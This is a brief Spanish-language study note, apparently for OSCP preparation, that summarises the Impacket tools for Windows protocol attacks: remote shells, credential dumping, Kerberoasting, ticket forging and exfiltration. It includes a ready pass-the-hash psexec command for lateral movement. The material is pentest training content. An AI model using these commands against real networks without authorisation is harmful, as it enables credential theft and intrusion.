# Impacket > Suite **Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un "Windows hablante" en Kali. ## Los más útiles ``` impacket-psexec → shell en la víctima si tienes creds (estilo PsExec) impacket-wmiexec → ejecutar comandos sin tocar disco impacket-smbexec → otra ejecución remota impacket-secretsdump → vuelca NTDS.dit y SAM de un DC en remoto → secretsdump impacket-GetUserSPNs → Kerberoasting impacket-GetNPUsers → AS-REP Roasting impacket-getTGT → pide/forja un TGT con cred conocida impacket-getST → pide un service ticket impacket-smbserver → share SMB falso para exfiltrar a Kali (Transferencia de ficheros) impacket-ntlmrelayx → relay NTLM impacket-ticketer → forja tickets → Golden Ticket ``` ## Lateral con hash (sin reverse shell nueva) ```bash impacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20' ``` Shell SYSTEM en otra máquina, autenticado y limpio → Pass-the-Hash, Movimiento lateral. Relacionado: Mimikatz · Active Directory · OSCP MOC